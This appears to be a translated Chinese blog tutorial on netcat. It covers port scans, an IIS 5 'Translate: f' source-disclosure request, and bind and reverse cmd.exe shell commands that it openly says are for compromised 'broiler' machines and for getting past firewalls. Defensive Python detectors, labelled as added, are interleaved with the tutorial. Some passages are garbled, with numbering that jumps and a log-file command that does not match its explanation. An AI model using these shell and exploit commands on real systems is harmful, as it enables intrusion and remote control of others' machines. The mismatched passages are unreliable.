NC Command Explanation
Filed under: security-ranbo @ 9:08 pm
Netcat is known as the 'Swiss Army knife' of the network security community; surely there is nobody who does not know it...
It is a simple and useful tool that reads and writes data across a network connection using the TCP or UDP protocol. It was designed as a stable backdoor tool
that can be driven easily and directly by other programs and scripts. At the same time it is also a powerful network debugging and probing tool, able to establish almost any type of network connection you need,
and it has several interesting built-in features (see the usage below for details).
In China there are two Windows versions of it: the original version written by Chris Wysopal, and a new 'condensed' version compiled by 'Red and Black'.
The main program of the 'condensed' version is only a little over 10 KB (the 10 KB nc cannot perform uses 4 and 5 described below;
the original nc, which has that function, seems to be about 60 KB :P). Although its 'volume' is small, it does a great deal of work.
I. Basic use
To connect somewhere: nc [-options] hostname port[s] [ports] ...
To bind a port and wait for a connection: nc -l -p port [-options] [hostname] [port]
Parameters:
-e prog      program redirection: once connected, execute prog [dangerous!!]
-g gateway   source-routing hop point[s], up to 8
-G num       source-routing pointer: 4, 8, 12, ...
-h           help information
-i secs      delay interval for lines sent and ports scanned
-l           listening mode, for inbound connections
-n           numeric-only IP addresses, no hostname lookup
-o file      hex dump of the traffic to file
-p port      local port number
-r           randomize local and remote ports
-s addr      local source address
-u           UDP mode
-v           verbose output (use -v twice for more detail)
-w secs      timeout for connects and final net reads
-z           zero-I/O mode (input and output turned off), used for scanning
A port number can be given singly, or as a range in lo-hi form.
Example: scanning ports
TCP scan
C:\nc>nc -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?)
net [192.168.0.80] 139 (netbios-ssn) open
net [192.168.0.80] 138 (?)
net [192.168.0.80] 137 (netbios-ns)
net [192.168.0.80] 136 (?)
net [192.168.0.80] 135 (epmap) open
net [192.168.0.80] 81 (?) open
net [192.168.0.80] 80 (http) open
net [192.168.0.80] 79 (finger)
net [192.168.0.80] 25 (smtp) open
net [192.168.0.80] 24 (?)
net [192.168.0.80] 23 (telnet)
net [192.168.0.80] 21 (ftp)
UDP scan
C:\nc>nc -u -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] (?) open
net [192.168.0.80] 139 (?) open
net [192.168.0.80] 138 (netbios-dgm) open
net [192.168.0.80] 137 (netbios-ns) open
net [192.168.0.80] (?) open
net [192.168.0.80] 53 (domain) open
net [192.168.0.80] (?) open
net [192.168.0.80] 37 (time) open
net [192.168.0.80] 7 (echo) open
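As an added example (not part of the original article), the following Python parses the one-line-per-port output that nc -v -z prints in the format shown above and reports the open ports that are not on an allowlist, which is how a defender turns a scan of their own host into an exposure check; the sample lines, host and allowlist are constructed.

```python
import re
from collections import namedtuple

# One nc -v -z result line looks like (format taken from the scan output above):
#   net [192.168.0.80] 139 (netbios-ssn) open
#   net [192.168.0.80] 140 (?)
# A trailing "open" means the connect succeeded; no suffix means it did not.
LINE_RE = re.compile(
    r"^\S+\s+\[(?P<ip>[\d.]+)\]\s+(?P<port>\d+)\s+\((?P<svc>[^)]*)\)(?P<open>\s+open)?\s*$",
    re.IGNORECASE,
)

ScanResult = namedtuple("ScanResult", "ip port service open")


def parse_nc_scan(text):
    """Parse nc -v -z output into ScanResult records; lines that do not match are skipped."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            results.append(ScanResult(m.group("ip"), int(m.group("port")),
                                      m.group("svc"), m.group("open") is not None))
    return results


def unexpected_open_ports(results, allowed):
    """Open ports not in the per-host allowlist (allowed: {ip: set of ports})."""
    return [r for r in results if r.open and r.port not in allowed.get(r.ip, set())]


# Constructed sample in the same format as the page's TCP scan (not real output).
SAMPLE = """\
net [192.168.0.80] 140 (?)
net [192.168.0.80] 139 (netbios-ssn) open
net [192.168.0.80] 135 (epmap) open
net [192.168.0.80] 80 (http) open
net [192.168.0.80] 25 (smtp) open
net [192.168.0.80] 21 (ftp)
"""

# Assumed policy for the sample host: only web and mail should be reachable.
ALLOWED = {"192.168.0.80": {80, 25}}

if __name__ == "__main__":
    for r in unexpected_open_ports(parse_nc_scan(SAMPLE), ALLOWED):
        print(f"unexpected open port {r.port} ({r.service}) on {r.ip}")
```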
II. Advanced applications
1. MIME spoofing against IE
This site provides n hacker levels; passing the n-th level proves you have got started. I did it.
http://www.try2hack.nl
There is also a domestic version.
This page tells us that our browser is not IE 6.72, our operating system is not Linux, and we did not come from
www.microsoft.com/ms.htm
via the redirect link. Does Linux have IE 6.72? Would Microsoft put the
http://www.try2hack.nl/cgi-bin/level7.pl
link on its own page?
nc 221.10.222.34 80
GET /level/level7.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, application/msword, */*
Referer: http://www.microsoft.com/ms.htm
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux i686)
Host: 221.10.222.34
Connection: keep-alive
2. IIS 5 "Translate: f" source disclosure vulnerability
Translate: f vulnerability mechanism: a malformed HTTP GET request for a server-side executable script or related file type (for example .asp or global.asa) is sent to the server. These files are meant to run on the server and should never be delivered to the client, but this request causes IIS to send the contents of the file to the remote client instead of running it on the server. The key features of this malformed HTTP GET request are that it ends with a specific header, Translate: f, and that a backslash "\" is appended to the URL. Here is an example ([CRLF] represents a carriage return/line feed):
Note the backslash after GET /global.asa and the Translate: f header.
GET /global.asa\ HTTP/1.0
Host: 192.168.0.1
User-Agent: sensepostdata
Content-Type: application/x-www-form-urlencoded
Translate: f
[CRLF]
[CRLF]
Save the above content in a text file (for example example.txt)
and send it to a server that has this vulnerability:
C:\>type example.txt | nc -nvv 192.168.0.80 80
(UNKNOWN) [192.168.0.80] 80 (?) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, Dec 2002 08:50:46 GMT
Content-Type: application/octet-stream
Content-Length: 2790
ETag: "0448299fcd6df1:bea"
Last-Modified: Wed, 2002 18:50:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
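As an added detection example (not from the original article), this Python checks a captured raw HTTP request for the two features the text names, the Translate: f header and the backslash appended to a script file's URL; it is meant for request text captured by a proxy or IDS rather than for IIS access logs, which do not record headers. The samples are the request quoted above plus two constructed benign ones.

```python
# Server-side file types the text says must never be delivered to a client.
SCRIPT_EXT = (".asp", ".asa", ".inc")


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, version, headers) or None."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), parts[1], parts[2], headers


def translate_f_indicators(raw):
    """Return which of the page's indicators a GET request carries."""
    parsed = parse_request(raw)
    if parsed is None or parsed[0] != "GET":
        return set()
    _, path, _, headers = parsed
    found = set()
    if headers.get("translate", "").lower() == "f":
        found.add("translate-f")
    base = path.lower()
    for suffix in ("\\", "%5c"):          # literal or URL-encoded trailing backslash
        if base.endswith(suffix):
            found.add("trailing-backslash")
            base = base[: -len(suffix)]
    if base.endswith(SCRIPT_EXT):
        found.add("script-file")
    return found


def is_translate_f_probe(raw):
    """Translate: f alone is also sent by legitimate WebDAV clients, so require a script target too."""
    return {"translate-f", "script-file"} <= translate_f_indicators(raw)


# The request quoted above, plus two constructed benign requests for comparison.
PROBE = ("GET /global.asa\\ HTTP/1.0\r\nHost: 192.168.0.1\r\nUser-Agent: sensepostdata\r\n"
         "Content-Type: application/x-www-form-urlencoded\r\nTranslate: f\r\n\r\n")
NORMAL = "GET /default.asp HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"
WEBDAV = "GET /docs/readme.txt HTTP/1.1\r\nHost: 192.168.0.1\r\nTranslate: f\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("probe", PROBE), ("normal", NORMAL), ("webdav", WEBDAV)):
        print(name, is_translate_f_probe(req), sorted(translate_f_indicators(req)))
```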
Examples:
1) Connect to a remote host, for example:
Format: nc -nvv 192.168.x.x 80
Explanation: connects to TCP port 80 of 192.168.x.x
2) Listen on the local host, for example:
Format: nc -l -p 80
Explanation: listens on TCP port 80 of this machine
3) Scan a remote host, for example:
Format: nc -nvv -w2 -z 192.168.x.x 80-445
Explanation: scans all ports of 192.168.x.x from TCP 80 to TCP 445
4) Bind a shell on a remote host, for example:
Format: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
Explanation: binds the remote host's cmd shell to TCP port 5354 of the remote host
5) Bind a shell on a remote host with a reverse connection, for example:
Format: nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: binds the remote host's cmd shell and connects back to TCP port 5354 of 192.168.x.x
These are some of the most basic uses (in fact nc has many more uses; combined with the pipe command '|',
the redirect commands '<' and '>', and so on, it becomes even more powerful...).
=====================================================================================================
Advanced usage:
6) For attack programs, for example:
Format 1: type.exe c:\exploit.txt | nc -nvv 192.168.x.x 80
Format 2: nc -nvv 192.168.x.x c:\log.txt
Explanation: with '-L' nc keeps listening on a port until Ctrl+C and writes the results to 'c:\log.txt';
change '>' to '>>' to append to the log instead.
Note: 'c:\log.txt' is the log file, etc.
9) For honeypot use, example 3:
Format 1: nc -L -p E:\log.dat
Command 1: listening
nc -l -p port
nc -l -v -p port
Parameter explanation:
-l: listening mode, listen for inbound information
-p: followed by the local port number
-v: display information about the port; with -vv, display more detailed information about the port
Tip: most people like to use -vv
nc -l -p 80
This is simple: listen on port 80.
If this command is running on a machine, port 80 appears open, which can fool a lot of scanners!
nc -l -p 80 > e:\log.dat
Hehe, same function as above, but with "> e:\log.dat" added. I think anyone who has learned the echo command
knows what that does: it creates a log file log.dat on drive E.
nc -l -v -p 80
Similar to the command above, but this time the result is not recorded in a file; it is displayed directly
on the screen where nc is running.
Oh, I have talked so much; let's practise:
nc -l -v -p 80
Then enter the local IP, 127.0.0.1, in the browser.
Oh, what do you see?
The same goes for the two commands above; test them yourself.
Command 2: program redirection
nc -l -p port -t -e cmd.exe
Local machine: nc -l -p port or nc -l -v -p port
Target machine: nc -e cmd.exe IP port
Parameter explanation:
-l, -p: the two parameters explained above
-e: its function is program redirection
-t: answer in telnet form
Example
nc -l -p 5277 -t -e cmd.exe
Do you know where to run it? Never run it on your own machine; if you do, your machine
becomes a telnet server, hehe. Explanation: listen on local port 5277 for
inbound information and at the same time redirect the program cmd.exe to port 5277; when someone connects, cmd.exe responds to the connection request in telnet form.
To put it bluntly, this turns the host into a telnet 'chicken', so this command is run on your broiler (compromised machine). (Narrator: you have said this so many times, do you take us for idiots? Get on with it!!!)
Oh, let's find a broiler, and I telnet IP 5277.
How about that, hoho~~?
Local machine: nc -l -p port (or nc -l -v -p port)
Remote machine: nc -e cmd.exe IP port
You know Gray Dove and Shentou; both of these tools are Trojans of the 'bounce port' (reverse-connecting) type.
What does bounce port mean? It means that when the other side runs the Trojan, you do not have to connect to it actively; that is to say,
instead of your client sending a connection request to the server running on the other host, the other side actively connects to you.
This defeats many firewalls, because many firewalls do not check outbound requests.
The two commands here together have, one could say, the same effect as those two Trojans. Why?
Cough!! Listen to me!! (Pay 100000000 RMB tuition first. Whoa, don't kill me!!)
nc -l -p 5277 (listen on local port 5277)
You can also use
nc -l -v -p 5277
Run it locally.
Then on the remote machine, find a way to run
nc -e cmd.exe IP 5277
(You don't really type "IP" on the broiler, ah! Type the actual address, xxx.xxx.xxx.xxx!!)
Oh, look what happened on the local machine?
This is the rebound ~~ You got a shell on the local machine.
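As an added detection example (not from the original article), this Python classifies netcat command lines like the ones above, taken from constructed process-creation log lines, into listener, bind shell or reverse shell, which is what a defender would alert on; the log line format, host names and file paths are assumed.

```python
import re
import shlex

NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "sh", "bash"}


def classify_nc_cmdline(cmdline):
    """Return 'bind-shell', 'reverse-shell', 'listener' or None for one process command line."""
    try:
        argv = [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]
    except ValueError:                      # unbalanced quotes: nothing we can parse
        return None
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in NC_NAMES:
        return None
    letters = set()
    for tok in argv[1:]:
        if tok.startswith("-") and tok[1:].isalpha():   # "-nvv" -> {'n','v'}; "-w2" ignored
            letters.update(tok[1:])
    listens = bool(letters & {"l", "L"})   # -l listen, -L re-listen (Windows build)
    spawns_shell = any(
        tok in ("-e", "-c") and i + 1 < len(argv)
        and re.split(r"[\\/]", argv[i + 1])[-1].lower() in SHELLS
        for i, tok in enumerate(argv)
    )
    if spawns_shell:
        return "bind-shell" if listens else "reverse-shell"
    return "listener" if listens else None


def scan_process_log(lines):
    """Each constructed line: '<timestamp> <host> <user> <command line>'. Return (host, user, verdict) hits."""
    hits = []
    for line in lines:
        fields = line.split(maxsplit=3)
        if len(fields) < 4:
            continue
        verdict = classify_nc_cmdline(fields[3])
        if verdict:
            hits.append((fields[1], fields[2], verdict))
    return hits


# Constructed log lines modelled on the commands discussed above (not real telemetry).
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z host1 alice C:\\tools\\nc.exe -l -p 5277 -t -e cmd.exe",
    "2024-01-01T10:01:00Z host2 bob C:\\tools\\nc.exe -e cmd.exe 192.168.1.5 5277",
    "2024-01-01T10:02:00Z host3 carol C:\\tools\\nc.exe -v -z -w2 192.168.0.80 1-140",
    "2024-01-01T10:03:00Z host4 dave C:\\tools\\nc.exe -L -p 80",
    "2024-01-01T10:04:00Z host5 eve C:\\Windows\\notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for host, user, verdict in scan_process_log(SAMPLE_LOG):
        print(f"{host}: {user} ran netcat as {verdict}")
```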
Command 3: scan ports
nc -v IP port
nc -v -z IP port-port
nc -v -z -u IP port-port
Parameter explanation:
-z: turn input and output off; used when scanning
nc -v IP port
This command scans a single port.
For example:
nc -v IP 135
Scans port 135 of the remote host and gets some simple information about the port; for some ports we can get more.
Example: port 80
We can use nc -v IP 80 and then use the GET method to obtain information about the other side's web server.
nc -v -z IP port-port
This command is used to quickly scan TCP ports; port-port specifies the range of ports to scan.
For example:
nc -v -z IP 1-200
Shows which of TCP ports 1-200 are open on my machine.
nc -v -z -u IP port-port
This command is the previous one plus -u; its role is still port scanning, but the extra -u parameter makes it scan UDP ports.
For example:
nc -v -z -u IP 1-200
This command scans UDP ports 1-200.
Command 4: transfer files (hoho, I like this one)
Local machine: nc -v -n IP port < y:\svr.exe
Parameter explanation:
-n: specify a numeric IP address
These two commands combined transfer a file.
First run this command on the remote machine:
nc -v -l -p 5277 > c:\pulist.exe
Remember this command? Oh, isn't it the same as the listening command? Yes, yes, this listens on port 5277
and writes the received data into c:\pulist.exe.
Now run on the local machine
nc -v -n IP 5277
This article comes from the ChinaUnix blog; to see the original, go to: http://blog.chinaunix.net/u1/59178/showart_1296797.html